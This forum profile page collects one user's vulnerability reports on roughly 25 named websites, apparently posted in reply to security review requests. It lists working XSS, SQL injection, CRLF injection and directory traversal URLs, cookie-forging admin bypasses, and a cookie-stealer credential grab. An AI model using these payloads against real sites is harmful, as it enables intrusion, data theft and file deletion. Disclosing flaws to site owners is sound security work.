Everything posted by agentsteal

  1. Array: http://www.businesstips101.com/news/yourageinseconds2.php?name[]
     Cross Site Scripting: http://www.businesstips101.com/news/yourageinseconds2.php?name=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
  2. Cross Site Scripting: There is Cross Site Scripting if your username contains code.
     Full Path Disclosure: http://octub.com/eve/?l=order&sl=cart&ship=582
  3. Cross Site Scripting: There is Cross Site Scripting if you post a note that contains code.
     Drop Down Menu: If you edit the Category drop down menu you can submit arbitrary values.
     SQL Injection: You can create columns in the table by submitting new categories.
  4. Array: http://www.ragingmortals.com/postoffice.php?fromper[]
     Array: http://www.ragingmortals.com/postoffice.php?ini[]
     Cross Site Scripting: http://www.ragingmortals.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.ragingmortals.com/postoffice.php?ini=</textarea><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting in the forum if you post a topic that contains code.
     Full Path Disclosure: http://www.ragingmortals.com/cgi-sys/scgiwrap/
     Full Path Disclosure: http://www.ragingmortals.com/includes/functions_tst.php
     Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
     Includes Directory: http://www.ragingmortals.com/includes/
     PHP Source Code Disclosure: There is PHP Source Code Disclosure on the 404 page.
     <?php if ($SESSION['username']){ echo "Or you cant return to the <a href=index2.php>game!"; } ?>
     User Enumeration: http://www.ragingmortals.com/~ragingmo
     User Enumeration: http://www.ragingmortals.com/~root
  5. Includes Directory: http://nasir.prohosts.org/config/
  6. Array: http://www.fantour.org/account.php?msg[]
     Array: http://www.fantour.org/searchresults.php?search[]
     Cross Site Scripting: http://www.fantour.org/account.php?msg=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.fantour.org/addfavconfirm.php?id=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.fantour.org/artistshows.php?id="><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.fantour.org/fans.php?id="><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.fantour.org/searchresults.php?search="><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.fantour.org/showphotos.php?un=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting if you post a comment that contains code.
     Cross Site Scripting: There is Cross Site Scripting if you register with ">code in the fields.
     Full Path Disclosure: http://www.fantour.org/addfavconfirm.php
     Full Path Disclosure: http://www.fantour.org/createshow.php?page=action
     Full Path Disclosure: http://www.fantour.org/delcommentconfirm.php
     Full Path Disclosure: http://www.fantour.org/login.php
     Full Path Disclosure: http://www.fantour.org/show.php
     Full Path Disclosure: http://www.fantour.org/showattenders.php
     Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image.
     Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.fantour.org/components/.
     Includes Directory: http://www.fantour.org/components/
     SQL Dump: http://www.fantour.org/addfavconfirm.php
     SQL Dump: http://www.fantour.org/show.php
     User Enumeration: http://www.fantour.org/~fantouro
     User Enumeration: http://www.fantour.org/~root
  7. Array: http://www.cashladders.com/ladders/king.php?ladder[]
     Cross Site Scripting: http://www.cashladders.com/ladders/challenge.php?login[cid]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/challenge.php?login[id]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/challengedb.php?chall[ladderid]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/join.php?action=jointourney&login[id]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/king.php?ladder='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/report.php?login[wid]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/standings.php?ladder[id]=1&ladder[rank]=1&ladder[unranked]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.cashladders.com/ladders/matchdb.php?matchdb[ladderid]='><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting if the War Details contain </textarea>code.
     Cross Site Scripting: There is Cross Site Scripting if your username contains '>code.
     Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain 'code.
     Drop Down Menu: If you edit the Timezone drop down menu you can set it to arbitrary values.
     Full Path Disclosure: http://www.cashladders.com/ladders/admin_3strikes.php
     Full Path Disclosure: http://www.cashladders.com/ladders/admin_3strikes_add.php
     Full Path Disclosure: http://www.cashladders.com/ladders/admin_report_db.php
     Full Path Disclosure: http://www.cashladders.com/ladders/challengedb.php?chall[start][]
     Full Path Disclosure: http://www.cashladders.com/ladders/html.php
     Full Path Disclosure: http://www.cashladders.com/ladders/king.php?matchdb[start][]
     Full Path Disclosure: http://www.cashladders.com/ladders/level.php
     Full Path Disclosure: http://www.cashladders.com/ladders/matchdb.php?matchdb[start][]
     Full Path Disclosure: http://www.cashladders.com/ladders/news_inc.php
     Full Path Disclosure: http://www.cashladders.com/ladders/ranks_inc.php
     Full Path Disclosure: http://www.cashladders.com/ladders/report_inc_db.php
     Full Path Disclosure: http://www.cashladders.com/ladders/strikes_main.php
     SQL Error: http://www.cashladders.com/ladders/king.php?matchdb[start]='
  8. Admin Access: The password box contains your password.
     Array: http://www.pidbaq.com/raids/raids.php?raid[]
     Cross Site Scripting: http://www.pidbaq.com/raids/raids.php?action=view&raid=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.pidbaq.com/raids/raids.php?decision=delete&raid='><marquee><h1>vulnerable</marquee>
     Includes Directory: http://www.pidbaq.com/raids/
     Log: http://www.pidbaq.com/raids/action_log
  9. Cross Site Scripting: http://www.visiscreen.com/~vincent/phpinfo.php?<script>alert('vulnerable')</script>
     Cross Site Scripting: There is Cross Site Scripting if your username contains code.
     Full Path Disclosure: http://www.visiscreen.com/~vincent/phpinfo.php
     Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
     Full Path Disclosure: There is Full Path Disclosure if your username contains '
     Full Path Disclosure: There is Full Path Disclosure on the Attack page.
  10. Cross Site Scripting: There is Cross Site Scripting in the iframe on the index page.
      Cross Site Scripting: There is Cross Site Scripting in the screenshots.
      Cross Site Scripting: There is Cross Site Scripting on http://fbc.ourproject.org/edituser.php if the fields contain ">code.
      Insecure Cookie: You shouldn't put the password in the cookie.
      Insecure Cookie: You shouldn't put the username in the cookie.
      User Enumeration: http://fbc.ourproject.org/~root
      You can upload multiple screenshots by changing the extension.
  11. Admin Access: You can log in as admin by setting the user cookie to admin.
      Cross Site Scripting: There is Cross Site Scripting if the lstvsit cookie contains code.
      Cross Site Scripting: There is Cross Site Scripting if the user cookie contains code.
      DOS: http://www.sentry.dreamhosters.com/stylechanger.php
      Insecure Cookie: You shouldn't put the password in the cookie.
      Insecure Cookie: You shouldn't put the username in the cookie.
      You can log in as any user by setting the user cookie to their username.
  12. Cross Site Scripting: http://www.babble-net.com/?action=NewThread2&id=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.babble-net.com/info.php?<script>alert('vulnerable')</script>
      Full Path Disclosure: http://www.babble-net.com/?action=NewThread2&id[]
      Full Path Disclosure: http://www.babble-net.com/?action=Reply2&id[]
      Full Path Disclosure: http://www.babble-net.com/?action=Reply2&pid[]
      Full Path Disclosure: http://www.babble-net.com/?action=usercp&user[]
      Full Path Disclosure: http://www.babble-net.com/?action=ViewBoard&id[]
      Full Path Disclosure: http://www.babble-net.com/?action=ViewThread&id[]
      Full Path Disclosure: http://www.babble-net.com/?action=ViewThread&pid[]
      Full Path Disclosure: http://www.babble-net.com/info.php
      SQL Injection:
        http://www.babble-net.com/?action=NewThread2&id=a AND 1=1
        http://www.babble-net.com/?action=NewThread2&id=a AND 1=2
  13. Array: http://blokdudez.110mb.com/forum/show_cat.php?cat[]
      Array: http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP[]
      Array: http://blokdudez.110mb.com/topic.php?topic[]
      Cross Site Scripting: http://blokdudez.110mb.com/forum/do_post.php?path=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://blokdudez.110mb.com/forum/make_topic.php?path='><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://blokdudez.110mb.com/forum/show_cat.php?cat=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://blokdudez.110mb.com/topic.php?topic=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if you post a topic that contains "code.
      Full Path Disclosure: http://blokdudez.110mb.com/forum/make_topic.php
  14. Full Path Disclosure: http://www.fast.st/zapwiki/demo/index.php?p=a
      User Enumeration: http://www.fast.st/~fastst
      User Enumeration: http://www.fast.st/~root
  15. Cross Site Scripting: There is Cross Site Scripting if you submit code.
  16. Admin Access: The SQL Dump contains your password.
      Admin Access: You can upload any file onto the server.
      Cross Site Scripting: There is Cross Site Scripting when you upload a file if the filename contains code.
      Cross Site Scripting: There is Cross Site Scripting in the admin messages.
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      Full Path Disclosure: http://jagguy.ej.am/school/test/upfile2.php
      Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://jagguy.ej.am/school/test/.
      Includes Directory: http://jagguy.ej.am/school/test/
      Includes Directory: http://jagguy.ej.am/school/test/student_files/
      PHP Source Code Disclosure: http://jagguy.ej.am/school/test/
      SQL Dump: http://jagguy.ej.am/school/test/db/
      You can upload any file if the filename contains .txt.
  17. Array: http://speaker219.ath.cx:8080/message/send.php?hand[]
      Cross Site Scripting: http://speaker219.ath.cx:8080/message/send.php?hand=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://speaker219.ath.cx:8080/message/test.php?ip=1.1.1.1&hand="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if you submit a message that contains code.
      Cross Site Scripting: There is Cross Site Scripting if you submit a note that contains </textarea>code.
      Cross Site Scripting: There is Cross Site Scripting if your password contains code.
      Cross Site Scripting: There is Cross Site Scripting if your username contains code.
      Directory Traversal: You can make txt files in any directory by registering with the username set to ../filename.
      Full Path Disclosure: http://speaker219.ath.cx:8080/login/database.php
      Full Path Disclosure: http://speaker219.ath.cx:8080/login/register.php
      Full Path Disclosure: There is Full Path Disclosure on the admin page.
      Full Path Disclosure: There is Full Path Disclosure when you register.
      Log: http://speaker219.ath.cx:8080/message/admin.txt
      Multiple users can register the same username.
      PHP Source Code Disclosure: http://speaker219.ath.cx:8080/message/index.php~
      You can make txt files in http://speaker219.ath.cx:8080/message/passys/ by registering with the username set to the filename.
      You shouldn't put the password in the URL.
      You shouldn't put the username in the URL.
  18. Admin Access: You can use the Directory Traversal to delete arbitrary files on the server.
      Cross Site Scripting: http://www.mycrdisorder.org/viewuser.php?user='onmouseover=alert('vulnerable')
      Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains code.
      Cross Site Scripting: There is Cross Site Scripting if you upload an image that contains code in the filename.
      Cross Site Scripting: There is Cross Site Scripting on http://www.mycrdisorder.org/contact.php if you send a message that contains code.
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      Directory Traversal: http://www.mycrdisorder.org/user.php?dpic=main&pic=../../images/mycrdheader.jpg
      Directory Traversal: http://www.mycrdisorder.org/user.php?function=viewuser&dpic=delete&pic=../../index.php
      Multiple users can upload the same filename.
  19. Admin Access: I got your username and password with a cookie stealer.
      Array: http://www.dreamshowstudios.net/programs.php?id[]
      Array: http://dreamshowstudios.net/viewpic.php?full[]
      Cross Site Scripting: http://dreamshowstudios.net/pm.php?dignore=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.dreamshowstudios.net/programs.php?id=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.dreamshowstudios.net/viewpic.php?pic="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if you send a message that contains code.
      Cross Site Scripting: There is Cross Site Scripting in the Shoutbox.
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      Directory Traversal: http://www.dreamshowstudios.net/viewpic.php?pic=../Images/splash
      Drop Down Menu: If you edit the drop down menu on http://www.dreamshowstudios.net/viewpic.php you can submit arbitrary values.
      Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?action[]
      Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?board[]
      Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg=-1
      Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg[]
      Full Path Disclosure: http://www.dreamshowstudios.net/pm.php?pto=Tester
      Full Path Disclosure: There is Full Path Disclosure in the Shoutbox.
      Full Path Disclosure: There is Full Path Disclosure when you register.
      Includes Directory: http://www.dreamshowstudios.net/h2/
      Insecure Cookie: You shouldn't put the password in the cookie.
      Insecure Cookie: You shouldn't put the username in the cookie.
      Maximum Length: If you edit the input boxes in your profile you can remove the maximum lengths.
      PHP Source Code Disclosure: http://www.dreamshowstudios.net/backup/
      PHP Source Code Disclosure:
      SQL Injection:
        http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=1
        http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=2
      SQL Injection:
        http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1
        http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2
      SQL Injection:
        http://www.dreamshowstudios.net/programs.php?id=3 AND 1=1
        http://www.dreamshowstudios.net/programs.php?id=3 AND 1=2
  20. Admin Access: Anyone can access the admin panel after viewing the admin profile.
      Array: http://www.evillair.net/sourcebb/edit_message.php?id[]
      Cross Site Scripting: http://www.evillair.net/sourcebb/edit_message.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if you edit a post that contains code.
      Cross Site Scripting: There is Cross Site Scripting in the admin panel if the fields contain code.
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      Cross Site Scripting: There is Cross Site Scripting on the 404 page. http://www.evillair.net/sourcebb/<marquee><h1>vulnerable</marquee>
      Full Path Disclosure: http://www.evillair.net/sourcebb/edit_message.php
  21. Admin Access: Anyone can access the admin panel by preventing the page from redirecting.
      Cross Site Scripting: http://sinisa.milicevici.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://sinisa.milicevici.com/phpinfo.php?<script>alert('vulnerable')</script>
      Cross Site Scripting: http://sinisa.milicevici.com/real_estate/details.php?id=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      DOS: http://www.sinisa.milicevici.com/real_estate/admin/admin.php/
      Drop Down Menu: If you edit the drop down menu on the Listing page you can submit arbitrary values.
      Full Path Disclosure: http://sinisa.milicevici.com/cgi-sys/scgiwrap/
      Full Path Disclosure: http://sinisa.milicevici.com/phpinfo.php
      Full Path Disclosure: http://sinisa.milicevici.com/real_estate/details.php?id[]
      Full Path Disclosure: http://sinisa.milicevici.com/real_estate/members/feature_it.php?id[]
      Full Path Disclosure: http://sinisa.milicevici.com/real_estate/members/pictures_edit.php?id[]
      Full Path Disclosure: There is Full Path Disclosure if you set the PHPSESSID cookie to an invalid value.
      Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image.
      Full Path Disclosure: There is Full Path Disclosure on the admin page.
      User Enumeration: http://sinisa.milicevici.com/~root
      User Enumeration: http://sinisa.milicevici.com/~zoranm
  22. Cross Site Scripting: http://www.arteinsania.net/?pname=</div><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      Full Path Disclosure: http://www.arteinsania.net/p_home.php
      Full Path Disclosure: There is Full Path Disclosure on the 404 page. http://www.arteinsania.net/site/whatever
  23. Cross Site Scripting: There is Cross Site Scripting if your username contains code.
      Cross Site Scripting: There is Cross Site Scripting on the 404 page. http://www.phpfootball.net/footballtest/<marquee><h1>vulnerable</marquee>
      Full Path Disclosure: There is Full Path Disclosure if you log in with a long username.
  24. Cross Site Scripting: There is Cross Site Scripting if the fields are set to ">code.
      META Tag Injection: http://www.mpmgraphics.com/oats/?text1=<meta+http-equiv='Set-cookie'+content='vulnerable=true'>
  25. Array: http://www.simple-scripts-online.com/signinform.php?msg[]
      Carriage Return Line Feed Injection: http://www.simple-scripts-online.com/insert_rating.php?sid=%0d%0aSet-Cookie%3A%20PHPSESSID%3Dvulnerable
      Carriage Return Line Feed Injection: http://www.simple-scripts-online.com/insertemails.php?sid=%0d%0aSet-Cookie%3A%20PHPSESSID%3Dvulnerable
      Cross Site Scripting: http://www.simple-scripts-online.com/signinform.php?msg=><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.simple-scripts-online.com/software-description.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.simple-scripts-online.com/tools/search/search.php?query="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if your username contains code.
      Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.simple-scripts-online.com/tools/.
      Includes Directory: http://www.simple-scripts-online.com/_private/
      Includes Directory: http://www.simple-scripts-online.com/_vti_pvt/
      Includes Directory: http://www.simple-scripts-online.com/banners/_vti_cnf/
      Includes Directory: http://www.simple-scripts-online.com/htdocs/
      Includes Directory: http://www.simple-scripts-online.com/images/_vti_cnf/
      Includes Directory: http://www.simple-scripts-online.com/tools/
      Includes Directory: http://www.simple-scripts-online.com/users/
      SQL Injection:
        http://www.simple-scripts-online.com/showcategory.php?cid=28 AND 1=1
        http://www.simple-scripts-online.com/showcategory.php?cid=28 AND 1=2
      SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/advertise1.php.
      SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/showcategory.php.
      SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/signup.php.
      URL Inclusion: http://www.simple-scripts-online.com/clicks_inc.php?id=1&click=1&url=http://www.google.com/